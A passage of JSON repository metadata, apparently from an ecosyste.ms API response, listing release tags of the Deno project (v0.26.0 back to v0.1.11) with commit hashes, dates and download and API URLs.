job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%